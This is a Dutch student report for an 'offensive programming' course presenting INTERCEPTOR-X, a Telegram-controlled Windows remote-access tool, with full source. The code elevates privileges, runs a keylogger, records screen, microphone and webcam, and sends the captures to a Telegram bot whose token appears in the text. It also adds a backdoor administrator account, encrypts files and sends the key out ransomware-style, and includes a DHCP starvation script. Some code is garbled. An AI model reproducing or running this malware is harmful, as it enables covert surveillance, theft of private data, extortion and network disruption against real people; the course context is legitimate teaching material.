top of page

OFFENSIVE PROGRAMMING CHAPTER 3 PETER OLDENBURGER




Page 1 of 46 OFFENSIVE PROGRAMMING CHAPTER 3 PETER OLDENBURGER Page 2 of 46 CONTENTS INTERCEPTOR-X ...................................................................... 3 Ontwikkelaar: ...................................................................... 3 GOAL: ..................................................................................... 3 KENMERKEN: ............................................................................ 4 IMPLEMENTATION .................................................................. 15 SECURITY & PRIVACY .......................................................... 16 CONCLUSION .......................................................................... 17 MAIN.PY - Uitleg & Details 18 NOTEPAD.PY - Uitleg & Details 31 ENCRYPT.PY - Uitleg & Details 29 DECRYPT.PY - Uitleg & Details 32 DHCP STARVATION - Uitleg, Detail & Screenshot 33 WINDOWS-DESTROYER.PY - Uitleg & Details 34 FINAL 44 DISCLAIMER 45 FOOTNOTES 46 1 CYBERSECURITYAD.COM INTERCEPTOR-X Telegram Bot - Beta 1.0 Ontwikkelaar: Peter Oldenburger Opdracht: CyberSecurity AD - Blok3 – Offensive Programming University of Applied Sciences Amsterdam Michael Drent Adnan Kazan GOAL Het ontwikkelen van een geavanceerde Telegram-bot voor cybersecurity doeleinden: Systeemmonitoring, Systeem instellingen wijzigen, Administrator users aanmaken, Encryptor, Keylogger, Audio en Video Snooper, toegespitst op het Windows-besturingssysteem. Page 3 of 46 KENMERKEN • Taal en Omgeving: Python, met gebruik van externe bibliotheken. • Telegram Bot: o /start o /stop o /status o /info o /screenshot o /audio o /video o /getip o /ping o /checkadmin o /createadmin o /setwallpaper o /encryptfiles o /decryptfiles o /showkey o /notepad • ZIP File Main.py sent a ZIP file every 5 minutes to HOST containing: o Audio_Record.wav o Screenshot.png o Video_Capture.avi o Keystrokes.txt Page 4 of 46 INLEIDING INTERCEPTOR-X is een centrale hub voor een reeks offensieve cybersecurity-technieken en -tools, geïntegreerd met een Telegram-botfunctionaliteit. Dit biedt op afstand bestuurbare mogelijkheden en een platform voor het rapporteren van de uitkomsten van diverse acties. De belangrijkste kenmerken en functionaliteiten worden hieronder beschreven: • Basis Setup: Het script begint met het importeren van vereiste modules en het instellen van een loggingsysteem om activiteiten te registreren. • Python Virtual Environment: Activering van specifiek Environment. • Elevate: Verkrijgt beheerdersrechten (Admin Rights) Telegram Bot Integratie: Het gebruikt de telegram module om een bot te creëren die kan reageren op commando's. Systeeminformatie en Netwerkfuncties: Het bevat functies om netwerkactiviteiten uit te voeren zoals het pingen van IP-adressen en het verkrijgen van het IP-adres van de huidige machine. Gebruikersbeheer: Het script kan controleren op de aanwezigheid van een specifieke gebruiker en deze indien nodig aanmaken met administratieve rechten. Bestandssysteem en Bestandsencryptie: Het biedt mogelijkheden om bestanden te versleutelen en te ontsleutelen, en ondersteunt het versturen van bestanden (waaronder versleutelde sleutels) via Telegram. Persistentie: Het streeft ernaar persistentie op het systeem te vestigen door wijzigingen aan te brengen in het Windows-register, waardoor het script bij elke opstart van het systeem wordt uitgevoerd. Audio- en Video-opname: Het kan audio opnemen en opslaan in een bestand, video opnemen via de webcam, en beide typen media naar Telegram versturen. Page 5 of 46 Screenshot Functie: Het kan screenshots maken en deze via Telegram verzenden. Toetsaanslagen Registreren: Het bevat een keylogger functionaliteit om toetsaanslagen te registreren en de verzamelde gegevens naar Telegram te sturen. Achtergrond en Schermbeheer: Het kan de bureaubladachtergrond veranderen, wat deel uitmaakt van zijn toolkit voor systeemaanpassing of mogelijk misbruik. Veiligheids- en Beveiligingsfuncties: Het bevat commando's om te controleren op en beheeracties uit te voeren, zoals het uitschakelen van Windows Defender. Aanvullende Scripts en Commando's: Het script heeft ook de mogelijkheid om extra Python-scripts uit te voeren die aanvullende 'destroy'-functionaliteiten bieden, zoals het massaal openen van notepad vensters of het verder versleutelen van bestanden. De gecombineerde functies wijzen op een geavanceerde toolkit bedoeld voor cybersecurity doeleinden, maar het benadrukt ook de noodzaak van ethisch gebruik en de potentiële juridische gevolgen van misbruik buiten toestemming of legale testomgevingen. Het is belangrijk om dergelijke tools verantwoordelijk en binnen de grenzen van de wet te gebruiken. Peter Oldenburger 02-04-2024 Amsterdam CyberSecurityAD.com Page 6 of 46 FUNCTIONALITEITEN FOOTNOTES AT PAGE 45 o KEYLOGGING Registratie van toetsaanslagen: ▪ Time_Interval = 2 min (sends keystrokes.txt) ▪ Inclusief Datum & tijdsstempel. FOOTNOTE 1 Page 7 of 46 o SCREENSHOTTING Mogelijkheid tot het maken van schermafbeeldingen. ▪ /screenshot FOOTNOTE 2 Page 8 of 46 o MEDIA {AUDIO&VIDEO} Mogelijkheid tot het maken van Media opnamen ▪ Video = ▪ /Video ▪ Audio = ▪ /Audio FOOTNOTE 3 Page 9 of 46 Page 10 of 46 o SYSTEMINFO & NETWORK Uitvoeren van commando’s zoals ping, IP-adres ophalen. ▪ /GETIP ▪ /PING {addres} FOOTNOTE 5 o ENCRYPTION & DECRYPTION Mogelijkheid tot het uitvoeren van encryptie- en decryptieoperaties op systeembestanden. ▪ /EncryptFiles ▪ /DecryptFiles Non-Encrypted Encrypted – CAT Banner.txt – CAT Banner.txt FOOTNOTE 7 Page 11 of 46 o CRYPTOKEY Mogelijkheid van het versturen van de encryptie sleutel via Telegram. ▪ /ShowKey FOOTNOTE 7 Page 12 of 46 o NOTEPAD BANNER Mogelijkheid tot het tonen van een banner in Notepad. ▪ /Notepad FOOTNOTE 10 Page 13 of 46 o WALLPAPER Veranderen van bureaubladachtergrond. ▪ /SetWallpaper FOOTNOTE 11 Page 14 of 46 o ADMIN USER CHECK/ADD Administrator User checken en aanmaken. ▪ /CheckAdmin ▪ /CreateAdmin FOOTNOTE 13 Page 15 of 46 IMPLEMENTATION Deze software maakt uitgebreid gebruik van de Python-programmeertaal en een diversiteit aan bibliotheken om een uitgebreid scala aan functionaliteiten te bieden. Dankzij de integratie met de Telegram API, kan de bot communiceren met eindgebruikers, waardoor het mogelijk wordt om op afstand diverse opdrachten uit te voeren. Dit omvat het maken van schermafbeeldingen, het initiëren van audio- en video-opnames, en het opvragen van systeeminformatie, waardoor een interactieve en responsieve gebruikerservaring wordt gecreëerd. SECURITY & PRIVACY Het gebruik van deze bot brengt significante overwegingen op het gebied van veiligheid en privacy met zich mee. Het is essentieel dat dergelijke hulpmiddelen strikt binnen ethische grenzen en conform de geldende wetgeving worden gebruikt. Ze dienen uitsluitend te worden ingezet in gecontroleerde omgevingen waarbij expliciete toestemming van alle betrokken partijen verkregen is. Misbruik van deze technologie kan leiden tot ernstige juridische en ethische gevolgen, waardoor het noodzakelijk is om verantwoord en bewust gebruik te waarborgen. Page 16 of 46 CONCLUSION INTERCEPTOR-X is meer dan slechts een hulpmiddel; het is een geavanceerd instrument voor systeembeheer en cybersecurity doeleinden. Door de integratie van diverse technologieën en methodieken biedt deze bot een krachtige toolkit aan voor professionals op het gebied van IT-beveiliging, technologie-enthousiastelingen en ethische hackers. De mogelijkheden die INTERCEPTOR-X biedt, strekken zich uit van het eenvoudig beheren van systemen tot het uitvoeren van complexe beveiligingsanalyses en het proactief opsporen van kwetsbaarheden. Dit maakt het een onmisbare tool in het arsenaal van diegenen die de digitale wereld veiliger willen maken. Met de juiste kennis en ethisch gebruik kan INTERCEPTOR-X bijdragen aan een veiliger internetlandschap, waarbij de privacy en veiligheid van gebruikers voorop staan. Peter Oldenburger 2024 CyberSecurityAD.com Page 17 of 46 Page 18 of 46 MAIN.PY - Uitleg en Details #! "C:\Users\polde\OneDrive - HvA\Cyber_Security_AD_1_2024\blok3\programming\new\env\Scripts\python" # Peter Oldenburger - CyberSecurityAD - CS105 - Adnan Kazan & Michael Drent - # Main.py - INTERCEPT-X Windows Hacking Pro - Telegram Bot Beta 1.0 # Importeer benodigde bibliotheken en modules import logging #logging import subprocess #nieuwe processen starten, verbinding maken met hun input/output/error pipes, en hun return codes ophalen. import os #Biedt functies voor interactie met het besturingssysteem. Dit wordt gebruikt voor het bepalen van paden en het omgaan met bestanden. import datetime #werken met datums en tijden import requests #Wordt gebruikt om HTTP-verzoeken te maken. Dit is essentieel voor de communicatie met de Telegram API import threading #Maakt het mogelijk om taken in aparte threads uit te voeren, wat gebruikt wordt voor periodieke taken zoals het versturen van data naar Telegram. import time #Gebruikt voor time.sleep in periodieke taken en tijdmetingen, zoals bij het opnemen van video's. import zipfile #Wordt gebruikt voor het comprimeren van bestanden in een zip-bestand voordat ze naar Telegram worden verstuurd. from telegram import Update #Deze imports worden gebruikt voor het maken en beheren van de Telegram bot. from telegram.ext import Updater, CommandHandler, CallbackContext #Deze imports worden gebruikt voor het maken en beheren van de Telegram bot. from pynput.keyboard import Key, Listener #detecteren van toetsaanslagen als onderdeel van de keylogger functionaliteit. import pyaudio #opnemen van audio. import wave #opslaan van de opgenomen audio in het WAV-formaat. import cv2 #opnemen van video en het maken van screenshots import pyautogui #maken van screenshots. import sys #Gebruikt voor het afhandelen van systeem-specifieke parameters en functies, zoals sys.exit en het printen van het Python executable pad. print(sys.executable) # Voor Error en Debugging import signal #Gebruikt voor het afhandelen van signalen, zoals het netjes afsluiten van het script bij een SIGINT (Ctrl+C). from colorama import init, Fore, Style #Voor het kleuren van tekst in de console import ctypes #Staat interactie toe met C-code. init(autoreset=True) #Reset import mutagen # audio formats from collections import Counter # Keylog - Not Functional = Deze module biedt gespecialiseerde container datatypen naast de ingebouwde containers zoals lijsten, tuples en dictionaries. import string # Not-functional = constanten en klassen voor het werken met stringgegevens import matplotlib.pyplot as plt # Not-functional = MATLAB-achtige plotinterface voor het maken en aanpassen van figuren en plots from elevate import #Gebruikt om beheerdersrechten te verkrijgen bij het starten van het script. # Verkrijg beheerdersrechten Page 19 of 46 elevate() # Configureer loggen voor debugging doeleinden logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s') # Functie om virtuele omgeving te activeren def activate_virtual_environment(env_path): """Activate the virtual environment.""" if sys.platform.startswith('win'): activate_script = os.path.join(env_path, 'Scripts', 'activate.bat') else: activate_script = os.path.join(env_path, 'bin', 'activate') subprocess.call([activate_script], shell=True) # Functie om het script netjes af te sluiten bij ontvangst van een SIGINT (Ctrl+C) signaal def signal_handler(sig, frame): print('Exiting...') sys.exit(0) # Registreer de signaal handler voor SIGINT signal.signal(signal.SIGINT, signal_handler) # Telegram Token en Chat-OD TOKEN = "6672103339:AAHQrAHVnH32XU-0-EOVhWaE0gKyMWLr2Mo" CHAT_ID = "5517521840" # Tijds Interval SEND_INTERVAL = 60 send_interval = 60 # Tijds interval voor toetsaanslagen batch_time = 5 # Path waar/hoe deze stroken op te slaan. file_path = 'keystrokes.txt' # File paths KEYSTROKES_FILE_PATH = 'keystrokes.txt' SCREENSHOT_FILE_PATH = 'screenshot.png' AUDIO_FILE_PATH = "audio_record.wav" VIDEO_FILE_PATH = "video_capture.avi" # Ping # Ping Victim def perform_ping(ip_address): """Performs a ping to the specified IP address and returns the result.""" try: result = subprocess.run(["ping", "-n", "4", ip_address], capture_output=True, text=True) return result.stdout Page 20 of 46 except Exception as e: return f"Failed to execute ping: {e}" def ping_command(update: Update, context: CallbackContext): if not context.args: update.message.reply_text("Usage: /ping ") return # Get Victim IP def get_ip_command(update: Update, context: CallbackContext): """Sends the machine's IP address to the Telegram chat.""" ip_info = get_ip_address() update.message.reply_text(f"IP Address Information:\n{ip_info}") def get_ip_address(): """Gets the IP address of the current machine.""" try: result = subprocess.run(["ipconfig"], capture_output=True, text=True) return result.stdout except Exception as e: return f"Failed to get IP address: {e}" # Extact ip_address = context.args[0] # Call ping_result = perform_ping(ip_address) # Stuur terug naar Telegram update.message.reply_text(ping_result) # Check Admin User def check_admin_user_command(update: Update, context: CallbackContext): """Checks if an admin user exists and sends the result to the chat.""" message = check_admin_user() update.message.reply_text(message) def check_admin_user(): """Check if the admin user exists on the system.""" username = "dutchjinn" try: result = subprocess.run(["net", "user", username], capture_output=True, text=True) if "The command completed successfully." in result.stdout: return f"Admin user '{username}' is present." else: return f"Admin user '{username}' is not present." except subprocess.CalledProcessError: return "Failed to check for admin user." # Create Admin user def create_admin_user_command(update: Update, context: CallbackContext): """Creates an admin user and sends the result to the chat.""" username = "dutchjinn" Page 21 of 46 password = "hackeR888!" result_message = create_admin_user(username, password) update.message.reply_text(result_message) def create_admin_user(username, password): """Attempts to create an admin user on the system.""" try: subprocess.run(["net", "user", username, password, "/add"], check=True) subprocess.run(["net", "localgroup", "Administrators", username, "/add"], check=True) return f"User {username} added as an Administrator." except subprocess.CalledProcessError as e: return f"Failed to add user {username}. Error: {e}" # Wallpaper # Wallpaper Variablen SPI_SETDESKWALLPAPER = 20 SPIF_UPDATEINIFILE = 0x1 SPIF_SENDCHANGE = 0x2 # wallpaper style def set_wallpaper_style(): pass # Wallpaper Image Path def set_wallpaper(image_path): """Set the desktop wallpaper to the specified image.""" set_wallpaper_style() ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, image_path, SPIF_UPDATEINIFILE | SPIF_SENDCHANGE) def set_wallpaper_command(update: Update, context: CallbackContext): image_path = r'C:\Users\polde\OneDrive - HvA\Cyber_Security_AD_1_2024\blok3\programming\new\wallpaper888.jpg' try: set_wallpaper(image_path) update.message.reply_text("Wallpaper has been set to DutchJinn888.") except Exception as e: update.message.reply_text(f"Failed to set DutchJinn888 wallpaper: {str(e)}") # Run Script def run_script(script_name): """Runs a script based on the given script name.""" script_path = os.path.join(os.getcwd(), script_name) try: subprocess.run([sys.executable, script_path], check=True) logging.info(f"{script_name} executed successfully.") except subprocess.CalledProcessError as e: logging.error(f"Failed to execute {script_name}. Error: {e}") # Encrypt Files def encrypt_files_command(update: Update, context: CallbackContext): script_name = 'destroy-2-encrypt.py' Page 22 of 46 try: run_script("destroy-2-encrypt.py") update.message.reply_text("Files have been encrypted.") except Exception as e: update.message.reply_text(f"Failed to encrypt files: {str(e)}") # Decrypt Files def decrypt_files_command(update: Update, context: CallbackContext): script_name = 'destroy-2-decrypt.py' try: run_script("destroy-2-decrypt.py") update.message.reply_text("Files have been decrypted.") except Exception as e: update.message.reply_text(f"Failed to decrypt files: {str(e)}") # Crypt File/Key to Telegram def show_key_command(update: Update, context: CallbackContext): """Handles the /showkey command to send the encryption key to Telegram chat.""" try: send_key_to_telegram() update.message.reply_text("Encryption key sent to Telegram.") except Exception as e: logging.error(f"Failed to send encryption key: {e}") update.message.reply_text(f"Failed to send encryption key: {str(e)}") # Notepad Paytime! Contcact USSS def notepad_command(update: Update, context: CallbackContext): """Executes the external script 'destroy-1-notepad.py'.""" script_path = os.path.join(os.getcwd(), 'destroy-1-notepad.py') try: subprocess.run([sys.executable, script_path], check=True) logging.info("'destroy-1-notepad.py' executed successfully.") update.message.reply_text("destroy-1-notepad.py executed successfully.") except subprocess.CalledProcessError as e: logging.error(f"Failed to execute 'destroy-1-notepad.py'. Error: {e}") update.message.reply_text(f"Failed to execute destroy-1-notepad.py: {str(e)}") # Functies voor het interacteren met Telegram # Verstuur een tekstbericht naar een Telegram chat def send_message_to_telegram(message): url = f"https://api.telegram.org/bot{TOKEN}/sendMessage" try: response = requests.post(url, data={'chat_id': CHAT_ID, 'text': message}) logging.debug(f"Sent message to Telegram: {response.status_code}") except Exception as e: logging.error(f"Error sending message to Telegram: {e}") # Verstuur bestanden zoals foto's, audio of video naar een Telegram chat def send_data_to_telegram(file_path, is_photo=False, is_audio=False, is_video=False): Page 23 of 46 url = f"https://api.telegram.org/bot{TOKEN}/sendDocument" files = {'document': open(file_path, 'rb')} if is_photo: url = f"https://api.telegram.org/bot{TOKEN}/sendPhoto" files = {'photo': open(file_path, 'rb')} elif is_audio: url = f"https://api.telegram.org/bot{TOKEN}/sendAudio" files = {'audio': open(file_path, 'rb')} elif is_video: url = f"https://api.telegram.org/bot{TOKEN}/sendVideo" files = {'video': open(file_path, 'rb')} try: response = requests.post(url, files=files, data={'chat_id': CHAT_ID}) logging.debug(f"Sent {file_path} to Telegram: {response.status_code}") except Exception as e: logging.error(f"Error sending {file_path} to Telegram: {e}") # Functies voor het opnemen van audio, video en screenshots # Neem audio op voor een specifieke duur en sla het op als een bestand def record_audio(output_filename, duration=5): CHUNK = 1024 FORMAT = pyaudio.paInt16 CHANNELS = 2 RATE = 44100 audio = pyaudio.PyAudio() stream = audio.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK) print("Recording...") frames = [] for i in range(0, int(RATE / CHUNK duration)): data = stream.read(CHUNK) frames.append(data) print("Finished recording.") stream.stop_stream() stream.close() audio.terminate() wf = wave.open(output_filename, 'wb') wf.setnchannels(CHANNELS) wf.setsampwidth(audio.get_sample_size(FORMAT)) wf.setframerate(RATE) wf.writeframes(b''.join(frames)) Page 24 of 46 wf.close() set_audio_duration_metadata(output_filename, duration) # Neem audio op voor een specifieke duur en sla het op als een bestand def set_audio_duration_metadata(file_path, duration): try: if file_path.endswith('.mp3'): audio = MP3(file_path) audio.info.length = duration audio.save() elif file_path.endswith('.wav'): audio = mutagen.File(file_path) audio.info.length = duration audio.save() elif file_path.endswith('.ogg'): audio = OggVorbis(file_path) audio.info.length = duration audio.save() elif file_path.endswith('.flac'): audio = FLAC(file_path) audio.info.length = duration audio.save() elif file_path.endswith('.m4a'): audio = MP4(file_path) audio.info.length = duration audio.save() else: print("Unsupported audio format.") except Exception as e: print(f"Error setting audio duration metadata: {e}") # Neem video op voor een specifieke duur en sla het op als een bestand def capture_video(duration=5, output_filename="video_capture.avi"): cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc('XVID') out = cv2.VideoWriter(output_filename, fourcc, 20.0, (640, 480)) start_time = time.time() while int(time.time() - start_time) < duration: ret, frame = cap.read() if ret: out.write(frame) cap.release() out.release() # Maak een screenshot en sla deze op def take_screenshot(): screenshot = pyautogui.screenshot() screenshot.save(SCREENSHOT_FILE_PATH) Page 25 of 46 # Stuur File naar telegram def send_file_to_telegram(file_path): """Sends the file with keystrokes to Telegram chat.""" try: url = f'https://api.telegram.org/bot{TOKEN}/sendDocument' with open(file_path, 'rb') as file: files = {'document': file} data = {'chat_id': CHAT_ID} response = requests.post(url, files=files, data=data) print("File sent to Telegram." if response.status_code == 200 else f"Failed to send file: {response.text}") except Exception as e: print(f"Error sending file to Telegram: {e}") # Keystroke Definer Date/Time, When to etc.. keystrokes = [] last_keystroke_time = datetime.datetime.now() # Keystroke Pre-process (niet functioneel nu,beta) def preprocess_keystrokes(keystrokes): cleaned_keystrokes = [] prev_key = None for key in keystrokes: if key == "[ENTER]" and prev_key == "[ENTER]": continue if key.isprintable() or key == "[ENTER]": cleaned_keystrokes.append(key) prev_key = key return cleaned_keystrokes # Convert Keystrokes to Text TXT def keystrokes_to_text(keystrokes): return ' '.join(keystrokes).replace("[ENTER]", "\n") # Keystroke Analyse (niet functioneel nu, beta) def perform_frequency_analysis(text): words = text.split() return Counter(words) # Toets aanslagen naar File schrijven def write_keystrokes_to_file(batch): batch = batch.replace("[ENTER]", "\n") try: with open(file_path, 'a') as file: file.write(f"{batch}\n") except IOError as e: print(f"Failed to write to file: {e}") # Hoe om te gaan met key-aanslagen def on_press(key): Page 26 of 46 global last_keystroke_time if key == Key.esc: return False try: now = datetime.datetime.now() if key == Key.enter: keystrokes.append("[ENTER]") elif hasattr(key, 'char') and key.char.isalnum(): keystrokes.append(key.char) if (now - last_keystroke_time).seconds >= batch_time: timestamp = now.strftime('%Y-%m-%d %H:%M:%S') batch = f"{timestamp}: {''.join(keystrokes)}" write_keystrokes_to_file(batch) keystrokes.clear() last_keystroke_time = now except AttributeError: pass # Versturen (Sending, write en sent interval etc) def handle_sending(): """Handles the periodic task of writing and sending keystrokes.""" if keystrokes: now = datetime.datetime.now() timestamp = now.strftime('%Y-%m-%d %H:%M:%S') batch = f"{timestamp}: {''.join(keystrokes)}" write_keystrokes_to_file(batch) keystrokes.clear() send_file_to_telegram(file_path) threading.Timer(send_interval, handle_sending).start() #Start Periodic verstuur taak handle_sending() # Informeer de Gebruiker dat de keylogger geactiveerd is. print("Keylogger is running... Press ESC to quit.") # Overige functies zoals het loggen van toetsaanslagen en het periodiek verzenden van data naar Telegram def keylogger(): with Listener(on_press=on_press) as listener: listener.join() # Functie om periodiek taken uit te voeren zoals het maken van screenshots, opnemen van audio/video en verzenden naar Telegram def new_periodic_tasks(): while True: # Ververs Captures take_screenshot() record_audio(AUDIO_FILE_PATH, duration=5) capture_video(duration=5, output_filename=VIDEO_FILE_PATH) # Maak ZIP met alle Data Page 27 of 46 zip_filename = zip_data() # Verstuur de ZIP file send_data_to_telegram(zip_filename) logging.info(f"Data bundle {zip_filename} sent.") # Maakschoon os.remove(zip_filename) # Remove the zip file after sending time.sleep(SEND_INTERVAL) # Pause before next cycle # Functie om verzamelde data te comprimeren in een zip bestand def zip_data(): zip_filename = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S') + '.zip' files_to_zip = [KEYSTROKES_FILE_PATH, SCREENSHOT_FILE_PATH, AUDIO_FILE_PATH, VIDEO_FILE_PATH] with zipfile.ZipFile(zip_filename, 'w', zipfile.ZIP_DEFLATED) as zipf: for file in files_to_zip: if os.path.exists(file): zipf.write(file, arcname=os.path.basename(file)) return zip_filename # Functies voor Telegram commando's zoals /start, /stop, /status, etc. def start(update: Update, context: CallbackContext) -> None: update.message.reply_text('DutchJinn Bot started!') send_message_to_telegram("DutchJinn Initializing BOT") def stop(update: Update, context: CallbackContext) -> None: update.message.reply_text('DutchJinn Bot stopped!') def status(update: Update, context: CallbackContext) -> None: update.message.reply_text('DutchJinn Bot is running!') def shell(update: Update, context: CallbackContext) -> None: """Go into reversed shell""" cmd = ['cmd'] subprocess.Popen(cmd) def screenshot_command(update: Update, context: CallbackContext) -> None: """Take a screenshot and send it to the user.""" take_screenshot() send_data_to_telegram(SCREENSHOT_FILE_PATH, is_photo=True) def audio_command(update: Update, context: CallbackContext) -> None: """Send the audio file to the user.""" record_audio(duration=5, output_filename=AUDIO_FILE_PATH) send_data_to_telegram(AUDIO_FILE_PATH, is_audio=True) def video_command(update: Update, context: CallbackContext) -> None: """Send the video file to the user.""" capture_video(duration=5, output_filename=VIDEO_FILE_PATH) send_data_to_telegram(VIDEO_FILE_PATH, is_video=True) Page 28 of 46 # Export Ecryption/Decryption Key naar Telegram Bot def export_key_command(update: Update, context: CallbackContext) -> None: """Read the temporary key file and send its contents to Telegram.""" temp_key_file = "temp_key_data.txt" try: with open(temp_key_file, 'r') as file: encoded_key = file.read() message = f"Encryption Key: {encoded_key}" send_message_to_telegram(message) update.message.reply_text('Encryption key exported successfully.') except Exception as e: logging.error(f"Failed to export key: {e}") update.message.reply_text('Failed to export encryption key.') # Exporteer Encrption.key naar telegram def send_key_to_telegram(): """Sends the encryption key to the specified Telegram chat.""" key_file_path = "encryption_key.key" try: with open(key_file_path, 'rb') as file: key_data = file.read() key_hex = key_data.hex() message = f"Encryption Key: {key_hex}" url = f"https://api.telegram.org/bot{TOKEN}/sendMessage" data = {'chat_id': CHAT_ID, 'text': message} response = requests.post(url, data=data) if response.status_code == 200: print("Key successfully sent to Telegram.") logging.info("Key successfully sent to Telegram.") else: print("Failed to send key to Telegram.") logging.error(f"Failed to send key to Telegram. Status Code: {response.status_code}") except FileNotFoundError: print("Encryption key file not found.") logging.error("Encryption key file not found.") except Exception as e: print(f"An error occurred: {e}") logging.error(f"An error occurred when sending key to Telegram: {e}") # info in Telegram def info(update: Update, context: CallbackContext) -> None: update.message.reply_text('DutchJinn Telegram. You can use /start, /stop, /status, /info, /shell, /screenshot, /audio, /video, /getip, /ping, /checkadmin, /createadmin, /setwallpaper, /encryptfiles, /decryptfiles, /showkey, /notepad commands.') # Print Banner met kleur colorama import def print_banner_with_colorama(): orange_color = Fore.LIGHTRED_EX Page 29 of 46 banner = [''' banner ascii '''] for line in banner: print(f"{orange_color}{line}") # Hoofdfunctie waar het script mee begint # Start het script, inclusief het activeren van de virtuele omgeving en het printen van een welkomstbanner def main(): env_path = r'C:\Users\polde\OneDrive - HvA\Cyber_Security_AD_1_2024\blok3\programming\new\env' activate_virtual_environment(env_path) print_banner_with_colorama() print("Welcome to DutchJinn! Please choose an action:") print("1. Run Windows Destroyer Terminal Version (Debugged)") print("2. Run Telegram Bot, Beta Version") print("3. Run DHCP Starvation") print("4. Exit") choice = input("Enter your choice (1/2/3/4): ") if choice == "1": print("Running DutchJinn Windows Destroyer...") subprocess.run(["python", "windows-destroyer.py"]) print("Python Executable:", sys.executable) print("Python Path:", sys.path) elif choice == "2": print("Starting DutchJinn Telegram Bot...") start_telegram_bot() elif choice == "3": print("Running DHCP Starvation...") subprocess.run(["python", "dhcp-starvation.py"]) elif choice == "4": print("Exiting...") sys.exit(0) else: print("Invalid choice. Please enter 1, 2, 3, or 4.") # Start de Telegram bot en andere achtergrondtaken def start_telegram_bot(): threading.Thread(target=new_periodic_tasks, daemon=True).start() threading.Thread(target=keylogger, daemon=True).start() updater = Updater(TOKEN) dp = updater.dispatcher # Register de command handelrs Page 30 of 46 dp.add_handler(CommandHandler("start", start)) dp.add_handler(CommandHandler("stop", stop)) dp.add_handler(CommandHandler("status", status)) dp.add_handler(CommandHandler("info", info)) dp.add_handler(CommandHandler("shell", shell)) dp.add_handler(CommandHandler("screenshot", screenshot_command)) dp.add_handler(CommandHandler("audio", audio_command)) dp.add_handler(CommandHandler("video", video_command)) dp.add_handler(CommandHandler("export_key", export_key_command)) dp.add_handler(CommandHandler("ping", ping_command)) dp.add_handler(CommandHandler("getip", get_ip_command)) dp.add_handler(CommandHandler("checkadmin", check_admin_user_command)) dp.add_handler(CommandHandler("createadmin", create_admin_user_command)) dp.add_handler(CommandHandler("setwallpaper", set_wallpaper_command)) dp.add_handler(CommandHandler("encryptfiles", encrypt_files_command)) dp.add_handler(CommandHandler("decryptfiles", decrypt_files_command)) dp.add_handler(CommandHandler("showkey", show_key_command)) dp.add_handler(CommandHandler("notepad", notepad_command)) updater.start_polling() updater.idle() # start main if name == "__main__": main() NOTEPAD.PY Notepad opener with banner. #! "C:\Users\polde\OneDrive - HvA\Cyber_Security_AD_1_2024\blok3\programming\new\env\Scripts\python" #Notepad Banner Opener - Offensive Programming - Blok3 import subprocess def open_banner_in_notepad(): notepad_path = "notepad.exe" file_path = "banner.txt" subprocess.Popen([notepad_path, file_path]) for in range(5): openbanner_in_notepad() Page 31 of 46 Page 32 of 46 ENCRYPT.PY Encryptor (FerNet) #! "C:\Users\polde\OneDrive - HvA\Cyber_Security_AD_1_2024\blok3\programming\new\env\Scripts\python" # Encryptor - Offensive Programming - Blok3 from cryptography.fernet import Fernet #Crypto-Fernet import module import os # Geneer sleutel (Fernet Basis) key = Fernet.generate_key() cipher_suite = Fernet(key) def encrypt_file(file_path): """Encrypt a file using Fernet symmetric encryption.""" with open(file_path, 'rb') as file: # Lees data file file_data = file.read() # Encrypt data file encrypted_data = cipher_suite.encrypt(file_data) # Schrijf terug with open(file_path, 'wb') as file: file.write(encrypted_data) def encrypt_directory(directory_path): """Recursively encrypt each file in directory and subdirectories.""" for root, dirs, files in os.walk(directory_path): for file in files: file_path = os.path.join(root, file) encrypt_file(file_path) print(f"Encrypted {file_path}") # Directory Om te Ecrypten --- PAS OP !!!! directory_to_encrypt = "encrypt-this" encrypt_directory(directory_to_encrypt) # Bewaar de sleutel naar file with open("encryption_key.key", 'wb') as keyfile: keyfile.write(key) print("DutchJinn.com - Encryption complete. Don't lose the key!") Page 33 of 46 DECRYPT.PY Decryptor (FerNet) #! "C:\Users\polde\OneDrive - HvA\Cyber_Security_AD_1_2024\blok3\programming\new\env\Scripts\python" # Decryptor - Offensive Programming - Blok3 from cryptography.fernet import Fernet import os def load_key(key_file_path): """Load the encryption key.""" with open(key_file_path, 'rb') as keyfile: key = keyfile.read() return key def decrypt_file(file_path, cipher_suite): """Decrypt a file using Fernet symmetric encryption.""" with open(file_path, 'rb') as file: encrypted_data = file.read() # Decrypt data decrypted_data = cipher_suite.decrypt(encrypted_data) # Schrijf Terug with open(file_path, 'wb') as file: file.write(decrypted_data) def decrypt_directory(directory_path, cipher_suite): """Recursively decrypt each file in the directory and its subdirectories.""" for root, dirs, files in os.walk(directory_path): for file in files: file_path = os.path.join(root, file) decrypt_file(file_path, cipher_suite) print(f"Decrypted {file_path}") # Laad de key vanuit File key = load_key("encryption_key.key") # Initeer een fernet crypto met sleutel cipher_suite = Fernet(key) # Direcorty om te decrypten (deze moet overeenkomen met directory in ecrypt script) directory_to_decrypt = "encrypt-this" decrypt_directory(directory_to_decrypt, cipher_suite) print("Decryption complete. Check your files.") Page 34 of 46 DHCP-STARVATION DHCP-Peter.py #!/usr/bin/env python # Michael's Script als inspiratie, aangepast met gebruikersinvoer import time from scapy.all import * from scapy.all import get_if_list print(get_if_list()) def main(): layer2_broadcast = "ff:ff:ff:ff:ff:ff" conf.checkIPaddr = False # Vraag de gebruiker om de subnet van het IP-adres en de netwerkinterface IP_address_subnet = input("Enter IP Address Subnet (e.g., '10.0.0.'): ") network_interface = input("Enter Network Interface or Enter (e.g., 'eth0'): ") def send_dhcp_request(ip): bogus_mac_address = RandMAC() dhcp_request = Ether(src=bogus_mac_address, dst=layer2_broadcast) / IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) / BOOTP(chaddr=bogus_mac_address) / DHCP(options=[("message-type", "request"), ("server_id", IP_address_subnet + "1"), ("requested_addr", IP_address_subnet + str(ip)), "end"]) sendp(dhcp_request, iface=network_interface) print(f"Requesting: {IP_address_subnet}{ip}\n") time.sleep(1) for ip in range(2, 11): # Verzoek adressen van 10.0.0.2 tot 10.0.0.10 for in range(3): # Herhaal 3 keer senddhcp_request(ip) if name == "__main__": main() DHCP Server & Wireshark FOOTNOTE 14 DLO - Michael Drent - DHCP-Starvation HoeDoeIkDit. Page 35 of 46 Extra: 